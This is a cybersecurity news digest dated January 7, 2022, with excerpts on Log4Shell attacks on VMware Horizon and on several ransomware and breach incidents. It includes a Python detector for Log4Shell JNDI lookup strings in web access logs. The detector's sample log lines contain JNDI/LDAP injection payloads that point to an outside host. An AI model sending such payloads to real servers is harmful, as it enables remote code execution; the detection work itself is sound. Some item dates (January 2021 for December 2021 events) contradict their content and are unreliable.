January 7, 2022

Fortify Security Team
Jan 7, 2022

Title: NHS Warns of Hackers Exploiting Log4shell in VMware Horizon
Date Published: January 7, 2022


Excerpt: “According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure. ‘The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back malicious infrastructure,’ explains the alert. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
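The reconnaissance phase the NHS notice describes leaves a recognisable trace in web access logs: the JNDI lookup string arrives in a request field that the application later logs through Log4j. The following is an added detection example written for this digest; it is not code from the NHS notice, VMware or the Fortify team. It assumes Apache/Nginx "combined" access-log format and uses constructed sample lines with RFC 5737 documentation addresses, so it runs offline.

```python
"""Added example: flag Log4Shell-style JNDI lookup strings in web access logs.

The log lines below are constructed for this example (documentation IP ranges);
they are not taken from the NHS notice or from any real Horizon deployment.
"""
import re
from urllib.parse import unquote

# The lookup prefix that Log4Shell exploitation depends on. Case-insensitive,
# and tolerant of whitespace inside the braces.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined log format:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fields an unauthenticated client controls and that servers commonly log.
ATTACKER_CONTROLLED_FIELDS = ("request", "referer", "ua")


def normalize(value):
    """Decode URL-encoding twice so "%24%7Bjndi" is seen as "${jndi"."""
    return unquote(unquote(value))


def find_jndi_lookups(line):
    """Return [(field, decoded_value), ...] for each field carrying a lookup.

    Lines that do not parse as combined format yield an empty list rather
    than an exception, so one malformed line does not stop the scan.
    """
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ATTACKER_CONTROLLED_FIELDS:
        decoded = normalize(m.group(field))
        if JNDI_PATTERN.search(decoded):
            hits.append((field, decoded))
    return hits


def scan(lines):
    """Group findings by source IP: {ip: [(field, decoded_value), ...]}."""
    findings = {}
    for line in lines:
        hits = find_jndi_lookups(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            findings.setdefault(ip, []).extend(hits)
    return findings


# Constructed sample log lines (not real traffic). Line 2 carries the lookup
# in the User-Agent, line 3 carries it URL-encoded in the query string.
SAMPLE_LOG = [
    '203.0.113.10 - - [07/Jan/2022:10:15:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Jan/2022:10:15:09 +0000] "GET /portal/ HTTP/1.1" 200 812 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [07/Jan/2022:10:16:44 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '192.0.2.44 - - [07/Jan/2022:10:17:02 +0000] "POST /broker/xml HTTP/1.1" 200 310 "https://horizon.example/portal/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        for field, value in hits:
            print(f"{ip}: JNDI lookup in {field}: {value}")
```

Run against a real access log with `scan(open(path).read().splitlines())`. Hits are only indicators of an attempt; whether the lookup reached a vulnerable Log4j instance is settled by the Horizon host's own logs and outbound LDAP/RMI connections, not by the access log alone.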

Title: QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices
Date Published: January 7, 2022


Excerpt: “QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. ‘QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP networking devices,’ the Taiwanese NAS maker said in a press release issued today. The company warned users to check if their NAS is accessible over the internet by opening the Security Counselor, a built-in security portal for QNAP NAS devices.”

Title: Ransomware Attack Suffered by FinalSite Shuts Down Thousands of Websites
Date Published: January 7, 2022


Excerpt: “FinalSite is a software as a service (SaaS) company that provides K-12 school districts and institutions with website design, hosting, and content management solutions. FinalSite provides solutions for over 8,000 institutions and colleges in 115 countries. Recently, school districts whose websites were hosted by FinalSite discovered that they were no longer accessible or displayed errors. FinalSite did not reveal that they had been attacked at the time, instead stating that they were having error and ‘performance difficulties’ across different services, primarily their Composer content management system.”

Title: Enterprises Worry About Increased Data Risk in Cloud
Date Published: January 6, 2022


Excerpt: “The massive shift to a more distributed work environment and adoption of cloud services to support new business models over the past two years has impacted how enterprises assess cyber-risk and manage cloud vulnerabilities. Respondents to Dark Reading’s 2021 Strategic Security Survey say the shift away from on-premises infrastructures has significantly raised the level of cyber-risk associated with cloud services. When it comes to assessing risk, enterprises may be feeling more optimistic. In the 2020 survey, 31% of respondents said assessing risk was among the biggest information security challenges facing the organization. That figure drops to 24% in the 2021 survey. Similarly, 49% in 2020 named managing complexity as among the biggest challenges, while just 35% say so in the 2021 report.”

Title: Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech
Date Published: January 7, 2022


Excerpt: “Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One aspect of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered ‘a valuable trade secret and their intellectual property.’ According to the DoJ, the former employee stole this information ‘for the purpose of benefiting a foreign government, namely the People’s Republic of China.’ In June 2017, Xiang left these companies and boarded a flight back to China a day after. The 44-year-old drew the attention of airport officials who conducted a search — but it was not until later that investigators found copies of the Nutrient Optimizer stored on his electronic devices.”

Title: Thousands of Schools Impacted After IT Provider Hit by Ransomware
Date Published: January 7, 2022


Excerpt: “Finalsite claimed it had uncovered no evidence that data had been stolen as part of the raid but admitted that forensic work was still ongoing. Double extortion involving the threat of leaking stolen data is now the norm for such attacks, according to ransomware experts. According to Coveware, over 80% of attacks in Q3 involved the theft of corporate information alongside file encryption. There’s no sign of exactly how many schools have been impacted by the attack, although a Reddit user claimed around 2,200 might have been disrupted.”

Title: Over 3.7 Million Accounts Were Compromised in the Flexbooker Data Breach
Date Published: January 7, 2022


Excerpt: “FlexBooker is an online appointment scheduling platform that allows users to schedule appointments and sync employee calendars. The attack was carried out by a group calling themselves Uawrongteam, who published links to archives and files containing IDs, driver’s licenses, photos. The threat actors claim the stolen database contains customer information, including names, emails, phone numbers, hashed passwords, and password salt. The company already notified local authorities and sent a data breach notification to the impacted customers. According to the notification, threat actors compromised the service’s Amazon cloud storage system.”

Title: Night Sky, a New Ransomware Operation in the Threat Landscape
Date Published: January 7, 2021


Excerpt: “Researchers from MalwareHunterteam first spotted a new ransomware family dubbed Night Sky that implements a double extortion model in attacks aimed at businesses. Once a file is encrypted, the ransomware appends the ‘.night sky’ extension to encrypted file names. The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen from the victims that will not pay the ransom.”

Title: New Mexico’s Bernalillo County Investigates Ransomware Attack
Date Published: January 6, 2021


Excerpt: “Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality. While county buildings and offices are closed to the public, employees are working remotely to assist the public, officials wrote in a release. Emergency and public safety services are fully operational, Behavioral Health is operational, and community centers will remain open as scheduled. Its Treasurer’s Office is accepting tax payments through its online portal, through county drop boxes, and at any branch of the Rio Grande Credit Union, officials wrote.”

Title: Threat Actors Stole 1.1 Million Customer Accounts from 17 Well-Known Companies
Date Published: January 6, 2021


Excerpt: “After reviewing thousands of posts, the OAG compiled login credentials for customer accounts at 17 well-known companies, which included online retailers, restaurant chains, and food delivery services. In all, the OAG collected credentials for more than 1.1 million customer accounts, all of which appeared to have been compromised in credential stuffing attacks.” reads the report published by NY OAG. “The OAG contacted each of the 17 companies to alert them to the compromised accounts. The OAG also asked the companies to investigate and take steps to protect impacted customers. Every company did so.”
